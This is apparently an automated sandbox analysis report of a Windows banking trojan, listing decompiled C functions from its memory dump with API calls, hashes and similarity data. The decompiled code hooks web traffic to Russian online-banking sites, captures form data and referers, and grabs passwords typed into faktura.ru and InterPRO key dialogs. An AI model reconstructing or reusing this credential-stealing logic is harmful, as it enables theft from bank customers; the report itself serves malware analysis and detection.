          • Part of subcall function 0040A9B9: CloseHandle.KERNEL32(?), ref: 0040A9F6
        • CloseHandle.KERNEL32(?), ref: 00406FE6
        • CloseHandle.KERNEL32 ref: 00406FF2
        • CloseHandle.KERNEL32 ref: 00406FFE
        • CloseHandle.KERNEL32 ref: 0040700A
        Strings
        Memory Dump Source
        • Source File: 00000000.00000002.458525840.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
        Similarity
        • API ID: CloseHandle$CreateSleep$File$Path$CombineEventObjectSingleWait$AttributesDirectoryFolderSpecial
        • String ID: GetScrollRange$tClassLongW
        • API String ID: 4283066563-669566137
        • Opcode ID: 8596471a9fcb103a0491848a5fd4902ba1c5425abc6ad4e284b64256fefb4776
        • Instruction ID: bc6704ec4c5eea54e9a00987a3c30989331ad5c6e3c99f62b68ed883e491ae67
        • Opcode Fuzzy Hash: 8596471a9fcb103a0491848a5fd4902ba1c5425abc6ad4e284b64256fefb4776
        • Instruction Fuzzy Hash: 02517D71240241AFCA21AF62FD49EC73B79EFC5754B12803AB605AB2F1D7754821DB2D
        Uniqueness

        Uniqueness Score: -1.00%

        Function 00409FEA, Relevance: 28.1, APIs: 13, Strings: 3, Instructions: 118networksynchronizationthreadCOMMON
        Download Yara Rule
        C-Code - Quality: 95%
        			E00409FEA() {
				char _v12;
				HANDLE* _v48;
				long _v52;
				void _v64;
				intOrPtr _v92;
				void* __esi;
				void* _t28;
				intOrPtr _t33;
				intOrPtr _t40;
				intOrPtr _t43;
				void* _t48;
				void* _t53;
				signed int _t54;
				void* _t56;
				HANDLE* _t59;
				intOrPtr _t67;
				intOrPtr _t69;
				intOrPtr _t70;

				E0040F21C( &_v12,  &_v12, 0, 8);
				L00404155();
				E00412C8D();
				E0040882D();
				 *0x414ed4("ssLongW", _t53, _t56, _t48);
				E00412126();
				E0040F21C(SetThreadPriority(GetCurrentThread(), 2), "atorA", 0, 0x10);
				 *0x414a30 = CreateEventW(0, 1, 0, 0);
				E00412C4A();
				_t28 = InternetOpenA( *0x4155d4, 0, 0, 0, 0);
				 *0x414a34 = _t28;
				_v64 = 0xea60;
				InternetSetOptionA(_t28, 2,  &_v64, 4);
				E0040AEF2(0);
				E00407A50(0x4141dc,  &_v64, 0,  *0x414d18);
				_t33 =  *0x414ad4; // 0x241f5a8
				_v92 = E0040A8E2( &_v64, 0, E00409E78,  *((intOrPtr*)(_t33 + 0x28)));
				 *0x4147a2 = 0;
				 *0x414a2c = 0;
				L1:
				L1:
				if(WaitForSingleObject( *0x414a30, 0x14) == 0) {
					 *0x414a2c = 1;
				}
				_t67 =  *0x414a2c; // 0x726f7461
				if(_t67 != 0) {
					goto L9;
				}
				_t43 =  *0x414ad4; // 0x241f5a8
				if(E0040AA0E( *((intOrPtr*)(_t43 + 0x30))) != 0) {
					goto L1;
				} else {
					_t69 =  *0x414a2c; // 0x726f7461
					if(_t69 == 0) {
						E00409EBA( &_v52);
						WaitForSingleObject( *0x414a30, 0xffffffff);
						while(1) {
							_t70 =  *0x414a2c; // 0x726f7461
							if(_t70 <= 0) {
								goto L9;
							}
							Sleep(0x14);
						}
					}
				}
				L9:
				_t59 = _v48;
				WaitForMultipleObjects(_v52, _t59, 1, 0xffffffff);
				_t54 = 0;
				if(_v52 > 0) {
					do {
						CloseHandle(_t59[_t54]);
						_t54 = _t54 + 1;
					} while (_t54 < _v52);
				}
				E0040F15E(_t59);
				CloseHandle( *0x414a30);
				InternetCloseHandle( *0x414a34);
				_t40 =  *0x414ad4; // 0x241f5a8
				return E0040A9B9(_v64,  *((intOrPtr*)(_t40 + 0x28)));
			}





















        0x0040a000
        0x0040a005
        0x0040a00a
        0x0040a00f
        0x0040a019
        0x0040a01f
        0x0040a03b
        0x0040a04d
        0x0040a052
        0x0040a061
        0x0040a071
        0x0040a076
        0x0040a07e
        0x0040a086
        0x0040a096
        0x0040a09b
        0x0040a0ad
        0x0040a0b1
        0x0040a0b7
        0x00000000
        0x0040a0bd
        0x0040a0cd
        0x0040a0cf
        0x0040a0cf
        0x0040a0d5
        0x0040a0db
        0x00000000
        0x00000000
        0x0040a0dd
        0x0040a0ec
        0x00000000
        0x0040a0ee
        0x0040a0ee
        0x0040a0f4
        0x0040a0fb
        0x0040a108
        0x0040a118
        0x0040a118
        0x0040a11e
        0x00000000
        0x00000000
        0x0040a112
        0x0040a112
        0x0040a118
        0x0040a0f4
        0x0040a120
        0x0040a123
        0x0040a12c
        0x0040a132
        0x0040a138
        0x0040a13a
        0x0040a13d
        0x0040a143
        0x0040a144
        0x0040a13a
        0x0040a14b
        0x0040a156
        0x0040a162
        0x0040a168
        0x0040a17f

        APIs
          • Part of subcall function 00412C8D: PathCombineW.SHLWAPI(?,0241F5A8,?), ref: 00412CB4
          • Part of subcall function 00412C8D: PathCombineW.SHLWAPI(yNameW,yNameW,?), ref: 00412CC3
        • RtlInitializeCriticalSection.NTDLL(ssLongW), ref: 0040A019
        • GetCurrentThread.KERNEL32 ref: 0040A026
        • SetThreadPriority.KERNEL32(00000000), ref: 0040A02D
        • CreateEventW.KERNEL32(00000000,00000001,00000000,00000000,atorA,00000000,00000010), ref: 0040A047
        • InternetOpenA.WININET(00000000,00000000,00000000,00000000), ref: 0040A061
        • InternetSetOptionA.WININET ref: 0040A07E
          • Part of subcall function 0040AEF2: CharLowerBuffA.USER32(00000000,00000031,?,?,?,?,00000001,?,00000002), ref: 0040B025
          • Part of subcall function 0040A8E2: RtlAllocateHeap.NTDLL(00000008,00000018,?), ref: 0040A905
        • WaitForSingleObject.KERNEL32(00000014,00409E78,?), ref: 0040A0C5
        • WaitForSingleObject.KERNEL32(000000FF,?), ref: 0040A108
        • Sleep.KERNEL32(00000014), ref: 0040A112
        • WaitForMultipleObjects.KERNEL32(0000EA60,0000EA60,00000001,000000FF), ref: 0040A12C
        • CloseHandle.KERNEL32(0000EA60), ref: 0040A13D
        • CloseHandle.KERNEL32(0000EA60), ref: 0040A156
        • InternetCloseHandle.WININET ref: 0040A162
        Strings
        Memory Dump Source
        • Source File: 00000000.00000002.458525840.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
        Similarity
        • API ID: CloseHandleInternetWait$CombineObjectPathSingleThread$AllocateBuffCharCreateCriticalCurrentEventHeapInitializeLowerMultipleObjectsOpenOptionPrioritySectionSleep
        • String ID: `$atorA$ssLongW
        • API String ID: 2138626244-1144290972
        • Opcode ID: d0cfa77d0ea6f0d7d7a17ed41bacee77849ef1c229a2d3ffa27711e9f8b7cc92
        • Instruction ID: ccaa77ce3a4ebbf72ecbb8a1b2b60922b1b3ce95fef9568e287d169e41787bf1
        • Opcode Fuzzy Hash: d0cfa77d0ea6f0d7d7a17ed41bacee77849ef1c229a2d3ffa27711e9f8b7cc92
        • Instruction Fuzzy Hash: 50419FB1594300AFCB10AFA1ED49DDB7B68FF84395B01843AF211A25E1DB744824DF6E
        Uniqueness

        Uniqueness Score: -1.00%

        Function 0040A75A, Relevance: 25.6, APIs: 17, Instructions: 136filesynchronizationpipeCOMMON
        Download Yara Rule
        C-Code - Quality: 96%
        			E0040A75A(void _a4) {
				long _v8;
				void _v12;
				struct _OVERLAPPED* _v16;
				void* _v20;
				void _t59;
				void* _t71;
				long _t75;
				void** _t81;

				_t81 = _a4;
				_v20 = CreateMutexW(0x4155b4, 0, _t81[4]);
				SetEvent(_t81[2]);
				DisconnectNamedPipe( *_t81);
				if(WaitForSingleObject(_t81[1], 0) != 0) {
					_t75 = 4;
					do {
						if(ConnectNamedPipe( *_t81, 0) == 1) {
							_v12 = 0;
							_v8 = 0;
							_v16 = 0;
							_a4 = 0;
							if(ReadFile( *_t81,  &_v12, _t75,  &_v8, 0) != 0 && _v8 == _t75 && ReadFile( *_t81,  &_a4, _t75,  &_v8, 0) != 0 && _v8 == _t75) {
								_t59 = _a4;
								if(_t59 > 0xa00000) {
									_t59 = 0;
									_a4 = 0;
								}
								if(_t59 <= 0) {
									L13:
									_v12 = _t81[3]( &_a4);
									WriteFile( *_t81,  &_v12, _t75,  &_v8, 0);
									if(_a4 > 0xa00000) {
										_a4 = 0;
									}
									WriteFile( *_t81,  &_a4, _t75,  &_v8, 0);
									if(_a4 != 0) {
										WriteFile( *_t81, _v16, _a4,  &_v8, 0);
									}
									FlushFileBuffers( *_t81);
								} else {
									_t71 = E0040F14B(_t59);
									_v16 = _t71;
									if(_t71 != 0 && ReadFile( *_t81, _t71, _a4,  &_v8, 0) != 0 && _v8 == _a4) {
										goto L13;
									}
								}
							}
							E0040F15E(_v16);
							DisconnectNamedPipe( *_t81);
						}
					} while (WaitForSingleObject(_t81[1], 0) != 0);
				}
				CloseHandle(_v20);
				SetEvent(_t81[2]);
				_push(0);
				return RtlExitUserThread();
			}











        0x0040a761
        0x0040a779
        0x0040a77c
        0x0040a784
        0x0040a796
        0x0040a79f
        0x0040a7a0
        0x0040a7ac
        0x0040a7be
        0x0040a7c1
        0x0040a7c4
        0x0040a7c7
        0x0040a7d2
        0x0040a804
        0x0040a80c
        0x0040a80e
        0x0040a810
        0x0040a810
        0x0040a815
        0x0040a840
        0x0040a84e
        0x0040a85c
        0x0040a869
        0x0040a86b
        0x0040a86b
        0x0040a87a
        0x0040a883
        0x0040a892
        0x0040a892
        0x0040a89a
        0x0040a817
        0x0040a817
        0x0040a81c
        0x0040a821
        0x00000000
        0x00000000
        0x0040a821
        0x0040a815
        0x0040a8a3
        0x0040a8aa
        0x0040a8aa
        0x0040a8ba
        0x0040a8c2
        0x0040a8c6
        0x0040a8cf
        0x0040a8d5
        0x0040a8df

        APIs
        • CreateMutexW.KERNEL32(004155B4,00000000,?), ref: 0040A770
        • SetEvent.KERNEL32(?), ref: 0040A77C
        • DisconnectNamedPipe.KERNEL32(?), ref: 0040A784
        • WaitForSingleObject.KERNEL32(?,00000000), ref: 0040A78E
        • ConnectNamedPipe.KERNEL32(?,00000000), ref: 0040A7A3
        • ReadFile.KERNEL32(?,?,00000004,?,00000000), ref: 0040A7CA
        • ReadFile.KERNEL32(?,?,00000004,?,00000000), ref: 0040A7ED
        • ReadFile.KERNEL32(?,00000000,?,?,00000000), ref: 0040A82E
        • WriteFile.KERNEL32(?,?,00000004,?,00000000), ref: 0040A85C
        • WriteFile.KERNEL32(?,00A00000,00000004,?,00000000), ref: 0040A87A
        • WriteFile.KERNEL32(?,?,00A00000,?,00000000), ref: 0040A892
        • FlushFileBuffers.KERNEL32(?), ref: 0040A89A
        • DisconnectNamedPipe.KERNEL32(?,?), ref: 0040A8AA
        • WaitForSingleObject.KERNEL32(?,00000000), ref: 0040A8B4
        • CloseHandle.KERNEL32(?), ref: 0040A8C6
        • SetEvent.KERNEL32(?), ref: 0040A8CF
        • RtlExitUserThread.NTDLL(00000000), ref: 0040A8D6
        Memory Dump Source
        • Source File: 00000000.00000002.458525840.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
        Similarity
        • API ID: File$NamedPipeReadWrite$DisconnectEventObjectSingleWait$BuffersCloseConnectCreateExitFlushHandleMutexThreadUser
        • String ID:
        • API String ID: 1315446275-0
        • Opcode ID: 32c50313d7e46f667d15ab92ca2a2faa0f67596a8f396ea6274a29db632bfc1e
        • Instruction ID: 18f26e943705bdab19a4cacb318ddba564a9e94c024cb9a33cacf93ada1bc755
        • Opcode Fuzzy Hash: 32c50313d7e46f667d15ab92ca2a2faa0f67596a8f396ea6274a29db632bfc1e
        • Instruction Fuzzy Hash: 00511876800208FFDB21AF90DD48DEEBBB9FF84341B10843AF542E6160D7359A51DB58
        Uniqueness

        Uniqueness Score: -1.00%

        Function 0040BAF5, Relevance: 24.8, APIs: 5, Strings: 9, Instructions: 287networkCOMMON
        Download Yara Rule
        C-Code - Quality: 80%
        			E0040BAF5(void* __edx, char* __esi, intOrPtr _a4) {
				long _v8;
				char _v11;
				char _v12;
				signed int _v16;
				void* _v20;
				char* _v24;
				char* _v28;
				int _v68;
				char* _v72;
				void _v80;
				void* _v88;
				char _v348;
				void _v1372;
				void* __ebx;
				char _t86;
				intOrPtr _t96;
				void* _t110;
				intOrPtr _t125;
				int _t135;
				short _t136;
				signed int _t137;
				intOrPtr* _t142;
				intOrPtr _t143;
				long _t145;
				int _t146;
				intOrPtr _t148;
				intOrPtr _t149;
				intOrPtr _t150;
				char* _t154;
				void* _t160;
				signed char* _t161;
				signed int _t163;
				void* _t164;
				intOrPtr* _t166;
				char* _t168;
				void* _t169;

				_t168 = __esi;
				_v16 = _v16 | 0xffffffff;
				_t172 = __esi[0x414];
				if(__esi[0x414] == 0) {
					L25:
					if(_t168[0x41c] > 0x96000) {
						L61:
						return 1;
					}
					_v28 = "https://ibank*.ru/*";
					_v24 = "https://bc.nsk.*.ru/*";
					_v12 = 0x13;
					_v11 = 0x15;
					_t161 =  &_v12;
					_t142 =  &_v28;
					_v20 = 2;
					do {
						_t158 =  *_t161 & 0x000000ff;
						if(E0040A3D4( *_t142,  *_t161 & 0x000000ff, _t168, _t168[0x400], 0, 0, 2) != 0) {
							_v16 = 1;
							 *0x41479c = 1;
							E004063F9();
						}
						_t161 =  &(_t161[1]);
						_t142 = _t142 + 4;
						_t34 =  &_v20;
						 *_t34 = _v20 - 1;
					} while ( *_t34 != 0);
					if( *0x41479f == 0) {
						_push("https://www.faktura.ru/enter.jsp?site=");
						_t158 = 0x26;
						if(E0040F65D(_t168[0x400] - 1, _t168, _t158) == 0) {
							 *0x41479f = 1;
						}
					}
					if(_v16 != 0xffff) {
						L38:
						_t86 = _t168[0x41c];
						_t143 = 0;
						if(_t86 <= 0) {
							L47:
							_v20 = 0;
							_v12 = 0;
							_t163 = 0xc;
							if(_t168[4] != 0x73 || _t168[5] != 0x3a) {
								L50:
								_v16 = 0xb;
								goto L51;
							} else {
								_v16 = _t163;
								if(_t168[6] == 0x2f) {
									L51:
									_push( &_v20);
									_push( &_v12);
									E004065FE();
									if(_v16 == _t163) {
										 *0x414ed8(0x414f68);
										E0040CEFA(_t158, _a4, _t168,  &_v12,  &_v20);
										 *0x414edc(0x414f68);
									}
									_v8 = 0x3ff;
									if(HttpQueryInfoA(_t168[0x420], 0x80000023,  &_v1372,  &_v8, 0) == 0 || _v8 == 0) {
										_v8 = 1;
										_v1372 = 0x2d;
									}
									 *((char*)(_t169 + _v8 - 0x558)) = 0;
									_t164 = E0040F5EA(_t168[0x400], _t168);
									_t96 = 0x40220d;
									_t148 = _t143;
									if(_t143 == 0) {
										_t148 = 0x40220d;
									}
									_t203 = _v12;
									if(_v12 != 0) {
										_t96 = _v12;
									}
									_push(_t148);
									_push(_t96);
									_push( &_v1372);
									E0041352B(_t148, _t158, _t203, _v16, _t164, 0, L"%S\nReferer: %S\n%SData:\n\n%S", _t168);
									E0040F15E(_t164);
									E0040F15E(_v12);
									E0040F15E(_t143);
									goto L61;
								}
								goto L50;
							}
						}
						_t107 = _t86 + 1;
						if(_t86 + 1 == 0) {
							goto L61;
						}
						_t143 = E0040F14B(_t107);
						if(_t143 == 0) {
							goto L61;
						}
						E0040F19A(_t143, _t168[0x418], _t168[0x41c]);
						_t110 = 0;
						if(_t168[0x41c] <= 0) {
							goto L47;
						} else {
							goto L42;
						}
						do {
							L42:
							_t149 =  *((intOrPtr*)(_t110 + _t143));
							if(_t149 != 0x26) {
								__eflags = _t149 - 0x2b;
								if(_t149 == 0x2b) {
									 *((char*)(_t110 + _t143)) = 0x20;
								}
							} else {
								 *((char*)(_t110 + _t143)) = 0xa;
							}
							_t110 = _t110 + 1;
						} while (_t110 < _t168[0x41c]);
						goto L47;
					} else {
						if(_t168[0x404] != 0x50 || _t168[0x41c] < 5) {
							goto L61;
						} else {
							_v8 = 0x31;
							if(HttpQueryInfoA(_t168[0x420], 0x80000001,  &_v80,  &_v8, 0) == 0) {
								goto L61;
							}
							_t150 =  *0x414ad4; // 0x241f5a8
							_t158 = _v8;
							if(E0040F65D( &_v80 | 0xffffffff,  *((intOrPtr*)(_t150 + 0x128)), _v8,  &_v80) != 0) {
								goto L61;
							}
							goto L38;
						}
					}
				}
				_t166 = E004124A2( &_v8, __edx, _t172, _a4, 0x4e26, 0x20000000);
				_v20 = _t166;
				if(_t166 == 0) {
					goto L25;
				}
				if(E0040F94A(_t121, _v8) == 0) {
					L24:
					E0040F15E(_v20);
					if(_v16 == 0) {
						goto L61;
					}
					goto L25;
				} else {
					goto L3;
				}
				do {
					L3:
					_t8 = _t166 + 1; // 0x1
					_t154 = _t8;
					if( *_t154 == 0) {
						goto L12;
					}
					_t125 =  *_t166;
					_t145 = 0;
					if(_t125 != 0x2d) {
						__eflags = _t125 - 0x40;
						if(_t125 != 0x40) {
							__eflags = _t125 - 0x21;
							if(_t125 != 0x21) {
								goto L11;
							}
							_t145 = 1;
						} else {
							_t145 = 2;
						}
						goto L10;
					} else {
						_t145 = 3;
						L10:
						_t166 = _t154;
						L11:
						_t156 = _t166;
						_t159 = E0040F637(_t166);
						if(E0040A3D4(_t166, _t126, _t168, _t168[0x400], 0, 0, 2) != 0) {
							__eflags = _t145 - 1;
							_v16 = (0 | _t145 != 0x00000001) & 0x0000ffff;
							__eflags = _t145 - 3;
							if(_t145 != 3) {
								__eflags = _t145 - 2;
								if(_t145 != 2) {
									goto L24;
								}
								_t160 = 0x3c;
								E0040F21C( &_v88,  &_v88, 0, _t160);
								_v72 =  &_v348;
								_v88 = _t160;
								_v68 = 0x103;
								_t135 = InternetCrackUrlA(_t168, _t168[0x400], 0,  &_v88);
								__eflags = _t135;
								if(_t135 == 0) {
									L20:
									_t146 = 0;
									__eflags = 0;
									L21:
									_t136 = 0x14;
									 *0x4147c8 = _t136;
									_t137 = E0040F15E( *0x4147c0);
									__eflags = _t146;
									if(_t146 == 0) {
										 *0x4147c0 = 0;
									} else {
										 *0x4147c0 = E0040F5EA(_t137 | 0xffffffff, _t146);
									}
									goto L24;
								}
								__eflags = _v68;
								if(_v68 == 0) {
									goto L20;
								}
								_t146 =  &_v348;
								goto L21;
							}
							E0040C692(_t156, _t159, _t168, _t168);
							return 0;
						}
					}
					L12:
					_t166 = E0040F968(_t166, 1);
				} while (_t166 != 0);
				goto L24;
			}







































        0x0040baf5
        0x0040bafe
        0x0040bb02
        0x0040bb0b
        0x0040bc49
        0x0040bc53
        0x0040bea5
        0x00000000
        0x0040bea5
        0x0040bc59
        0x0040bc60
        0x0040bc67
        0x0040bc6b
        0x0040bc6f
        0x0040bc72
        0x0040bc75
        0x0040bc7c
        0x0040bc7c
        0x0040bc95
        0x0040bc97
        0x0040bc9e
        0x0040bca5
        0x0040bca5
        0x0040bcaa
        0x0040bcab
        0x0040bcae
        0x0040bcae
        0x0040bcae
        0x0040bcba
        0x0040bcc2
        0x0040bcca
        0x0040bcd4
        0x0040bcd6
        0x0040bcd6
        0x0040bcd4
        0x0040bce2
        0x0040bd4b
        0x0040bd4b
        0x0040bd53
        0x0040bd57
        0x0040bdad
        0x0040bdb3
        0x0040bdb6
        0x0040bdb9
        0x0040bdba
        0x0040bdcb
        0x0040bdcb
        0x00000000
        0x0040bdc2
        0x0040bdc6
        0x0040bdc9
        0x0040bdd2
        0x0040bdd5
        0x0040bdd9
        0x0040bdda
        0x0040bde2
        0x0040bdea
        0x0040bdfc
        0x0040be02
        0x0040be02
        0x0040be20
        0x0040be2f
        0x0040be37
        0x0040be3e
        0x0040be3e
        0x0040be48
        0x0040be5c
        0x0040be5e
        0x0040be63
        0x0040be67
        0x0040be69
        0x0040be69
        0x0040be6b
        0x0040be6f
        0x0040be71
        0x0040be71
        0x0040be74
        0x0040be75
        0x0040be7c
        0x0040be89
        0x0040be92
        0x0040be9a
        0x0040bea0
        0x00000000
        0x0040bea0
        0x00000000
        0x0040bdc9
        0x0040bdba
        0x0040bd59
        0x0040bd5c
        0x00000000
        0x00000000
        0x0040bd67
        0x0040bd6b
        0x00000000
        0x00000000
        0x0040bd7e
        0x0040bd83
        0x0040bd8b
        0x00000000
        0x00000000
        0x00000000
        0x00000000
        0x0040bd8d
        0x0040bd8d
        0x0040bd8d
        0x0040bd93
        0x0040bd9b
        0x0040bd9e
        0x0040bda0
        0x0040bda0
        0x0040bd95
        0x0040bd95
        0x0040bd95
        0x0040bda4
        0x0040bda5
        0x00000000
        0x0040bce4
        0x0040bceb
        0x00000000
        0x0040bcfe
        0x0040bd13
        0x0040bd22
        0x00000000
        0x00000000
        0x0040bd28
        0x0040bd2e
        0x0040bd45
        0x00000000
        0x00000000
        0x00000000
        0x0040bd45
        0x0040bceb
        0x0040bce2
        0x0040bb26
        0x0040bb28
        0x0040bb2d
        0x00000000
        0x00000000
        0x0040bb3d
        0x0040bc36
        0x0040bc39
        0x0040bc43
        0x00000000
        0x00000000
        0x00000000
        0x00000000
        0x00000000
        0x00000000
        0x0040bb43
        0x0040bb43
        0x0040bb43
        0x0040bb43
        0x0040bb49
        0x00000000
        0x00000000
        0x0040bb4b
        0x0040bb4d
        0x0040bb51
        0x0040bb58
        0x0040bb5a
        0x0040bb60
        0x0040bb62
        0x00000000
        0x00000000
        0x0040bb64
        0x0040bb5c
        0x0040bb5c
        0x0040bb5c
        0x00000000
        0x0040bb53
        0x0040bb53
        0x0040bb66
        0x0040bb66
        0x0040bb68
        0x0040bb74
        0x0040bb7c
        0x0040bb85
        0x0040bb9d
        0x0040bba6
        0x0040bba9
        0x0040bbac
        0x0040bbbb
        0x0040bbbe
        0x00000000
        0x00000000
        0x0040bbc2
        0x0040bbcb
        0x0040bbd6
        0x0040bbe4
        0x0040bbe8
        0x0040bbef
        0x0040bbf5
        0x0040bbf7
        0x0040bc06
        0x0040bc06
        0x0040bc06
        0x0040bc08
        0x0040bc0a
        0x0040bc11
        0x0040bc17
        0x0040bc1c
        0x0040bc1e
        0x0040bc30
        0x0040bc20
        0x0040bc29
        0x0040bc29
        0x00000000
        0x0040bc1e
        0x0040bbf9
        0x0040bbfc
        0x00000000
        0x00000000
        0x0040bbfe
        0x00000000
        0x0040bbfe
        0x0040bbaf
        0x00000000
        0x0040bbb4
        0x0040bb85
        0x0040bb87
        0x0040bb90
        0x0040bb92
        0x00000000

        APIs
        • InternetCrackUrlA.WININET(?,?,00000000,?), ref: 0040BBEF
        • HttpQueryInfoA.WININET(?,80000001,?,?,00000000), ref: 0040BD1A
        • RtlEnterCriticalSection.NTDLL(essAsUserA), ref: 0040BDEA
        • RtlLeaveCriticalSection.NTDLL(essAsUserA), ref: 0040BE02
        • HttpQueryInfoA.WININET(?,80000023,?,00000073,00000000), ref: 0040BE27
        Strings
        Memory Dump Source
        • Source File: 00000000.00000002.458525840.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
        Similarity
        • API ID: CriticalHttpInfoQuerySection$CrackEnterInternetLeave
        • String ID: %SReferer: %S%SData:%S$-$1$ageW$essAsUserA$https://bc.nsk.*.ru/*$https://ibank*.ru/*$https://www.faktura.ru/enter.jsp?site=$;@
        • API String ID: 1405552099-4101882370
        • Opcode ID: 7f5ff46773af2bcc4ba2a149951e76580bed8483634e46d37875d0541bbcfcd1
        • Instruction ID: baabd71f9d136b36cd8fcaa04f02b05750e3c39ad6ed55fcf7443dc5d36dbf6c
        • Opcode Fuzzy Hash: 7f5ff46773af2bcc4ba2a149951e76580bed8483634e46d37875d0541bbcfcd1
        • Instruction Fuzzy Hash: 34B1D270900648AAEB319BA0CC85BEF7BB9EF51304F10407AE151B62D1C77D6A85CB9D
        Uniqueness

        Uniqueness Score: -1.00%

        Function 00411AF9, Relevance: 24.5, APIs: 7, Strings: 7, Instructions: 49libraryloadermemoryCOMMON
        Download Yara Rule
        C-Code - Quality: 100%
        			E00411AF9() {
				struct HINSTANCE__* _t2;
				_Unknown_base(*)()* _t7;
				void* _t9;
				intOrPtr _t11;
				intOrPtr _t13;
				intOrPtr _t14;
				intOrPtr _t15;

				_t11 =  *0x415fb0; // 0x656d614e
				if(_t11 != 0) {
					L9:
					 *0x415fb0 =  *0x415fb0 + 1;
					return 1;
				} else {
					_t2 = LoadLibraryA("cabinet.dll");
					 *0x415fac = _t2;
					if(_t2 == 0) {
						L8:
						return 0;
					} else {
						 *0x415f98 = GetProcAddress(_t2, "FCICreate");
						 *0x415f9c = GetProcAddress( *0x415fac, "FCIAddFile");
						 *0x414fa4 = GetProcAddress( *0x415fac, "FCIFlushCabinet");
						_t7 = GetProcAddress( *0x415fac, "FCIDestroy");
						 *0x415fa0 = _t7;
						_t13 =  *0x415f98; // 0x75476574
						if(_t13 == 0) {
							L7:
							FreeLibrary( *0x415fac);
							goto L8;
						} else {
							_t14 =  *0x415f9c; // 0x6469
							if(_t14 == 0) {
								goto L7;
							} else {
								_t15 =  *0x414fa4; // 0x566d756e
								if(_t15 == 0 || _t7 == 0) {
									goto L7;
								} else {
									_t9 = HeapCreate(0, 0x80000, 0);
									 *0x414fa0 = _t9;
									if(_t9 != 0) {
										goto L9;
									} else {
										goto L7;
									}
								}
							}
						}
					}
				}
			}










        0x00411afc
        0x00411b02
        0x00411bb5
        0x00411bb5
        0x00411bbe
        0x00411b08
        0x00411b0d
        0x00411b13
        0x00411b1a
        0x00411bb1
        0x00411bb4
        0x00411b20
        0x00411b37
        0x00411b4d
        0x00411b63
        0x00411b68
        0x00411b6e
        0x00411b73
        0x00411b79
        0x00411ba5
        0x00411bab
        0x00000000
        0x00411b7b
        0x00411b7b
        0x00411b81
        0x00000000
        0x00411b83
        0x00411b83
        0x00411b89
        0x00000000
        0x00411b8f
        0x00411b96
        0x00411b9c
        0x00411ba3
        0x00000000
        0x00000000
        0x00000000
        0x00000000
        0x00411ba3
        0x00411b89
        0x00411b81
        0x00411b79
        0x00411b1a

        APIs
        • LoadLibraryA.KERNEL32(cabinet.dll,00000001,00411BE8,00000000,00411EC2,00000001,00000001,00000000,?,00413656,?,?,00000001,?), ref: 00411B0D
        • GetProcAddress.KERNEL32(00000000,FCICreate), ref: 00411B26
        • GetProcAddress.KERNEL32(FCIAddFile), ref: 00411B3C
        • GetProcAddress.KERNEL32(FCIFlushCabinet), ref: 00411B52
        • GetProcAddress.KERNEL32(FCIDestroy), ref: 00411B68
        • HeapCreate.KERNEL32(00000000,00080000,00000000,?,00413656,?,?,00000001,?), ref: 00411B96
        • FreeLibrary.KERNEL32(?,00413656,?,?,00000001,?), ref: 00411BAB
        Strings
        Memory Dump Source
        • Source File: 00000000.00000002.458525840.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
        Similarity
        • API ID: AddressProc$Library$CreateFreeHeapLoad
        • String ID: FCIAddFile$FCICreate$FCIDestroy$FCIFlushCabinet$RegEnumValueA$cabinet.dll$playName
        • API String ID: 2040708800-1429684230
        • Opcode ID: 7574706cf9ff557ecdf2496891627147f4999fe1e85c6bee8f6e72a309c4d430
        • Instruction ID: 998491fea5dfdfa671de0ec59278035e6ed8303dcb8bae0c70ff3513910943ef
        • Opcode Fuzzy Hash: 7574706cf9ff557ecdf2496891627147f4999fe1e85c6bee8f6e72a309c4d430
        • Instruction Fuzzy Hash: 091187B4945A20DFCB225FA0FC09ADA7B74BB88B11354C537FA19A62B4D7381582CF4D
        Uniqueness

        Uniqueness Score: -1.00%

        Function 00405718, Relevance: 22.8, APIs: 11, Strings: 2, Instructions: 93COMMON
        Download Yara Rule
        C-Code - Quality: 60%
        			E00405718(void* __ecx, struct HWND__* _a4, int _a8) {
				char _v104;
				struct HWND__* _t11;
				struct HWND__* _t12;
				struct HWND__* _t13;
				struct HWND__* _t14;
				struct HWND__* _t15;
				int _t24;
				void* _t27;
				void* _t28;
				struct HWND__* _t30;
				intOrPtr _t33;

				_t27 = __ecx;
				_t30 = _a4;
				_t33 =  *0x41479e; // 0x74
				if(_t33 == 0) {
					__eflags =  *0x41479f; // 0x69
					if(__eflags == 0) {
						E0040C34D(_t30, _t28, _a8);
					} else {
						_t11 = GetDlgItem(_t30, 1);
						__eflags = _t11;
						if(_t11 != 0) {
							_t12 = GetDlgItem(_t30, 2);
							__eflags = _t12;
							if(_t12 != 0) {
								_t13 = GetDlgItem(_t30, 0xcb);
								__eflags = _t13;
								if(_t13 != 0) {
									_t14 = GetDlgItem(_t30, 0xf0);
									__eflags = _t14;
									if(_t14 != 0) {
										_t15 = GetDlgItem(_t30, 0xf1);
										__eflags = _t15;
										if(_t15 != 0) {
											__eflags = GetDlgItemTextA(_t30, 0xcb,  &_v104, 0x63) - 1;
											if(__eflags > 0) {
												_push( &_v104);
												_push(L"faktura.ru data\n\nPassword: %S");
												goto L14;
											}
										}
									}
								}
							}
						}
					}
				} else {
					if(GetDlgItem(_t30, 1) != 0 && GetDlgItem(_t30, 2) != 0 && GetDlgItem(_t30, 0x65) != 0) {
						_t24 = GetDlgItemTextA(_t30, 0x66,  &_v104, 0x63);
						_t37 = _t24 - 1;
						if(_t24 > 1) {
							_push( &_v104);
							_push(L"InterPRO Key password: %S");
							L14:
							_push(0);
							_push(0);
							_push(0xc8);
							E0041352B(_t27, _t28, _t37);
						}
					}
				}
				return EndDialog(_t30, _a8);
			}














        0x00405718
        0x00405720
        0x00405726
        0x0040572c
        0x00405784
        0x0040578a
        0x00405809
        0x0040578c
        0x0040578f
        0x00405795
        0x00405797
        0x0040579c
        0x004057a2
        0x004057a4
        0x004057ad
        0x004057b3
        0x004057b5
        0x004057bd
        0x004057c3
        0x004057c5
        0x004057cd
        0x004057d3
        0x004057d5
        0x004057e5
        0x004057e8
        0x004057ed
        0x004057ee
        0x00000000
        0x004057ee
        0x004057e8
        0x004057d5
        0x004057c5
        0x004057b5
        0x004057a4
        0x00405797
        0x0040572e
        0x00405739
        0x0040576a
        0x00405770
        0x00405773
        0x0040577c
        0x0040577d
        0x004057f3
        0x004057f3
        0x004057f4
        0x004057f5
        0x004057fa
        0x004057ff
        0x00405773
        0x00405739
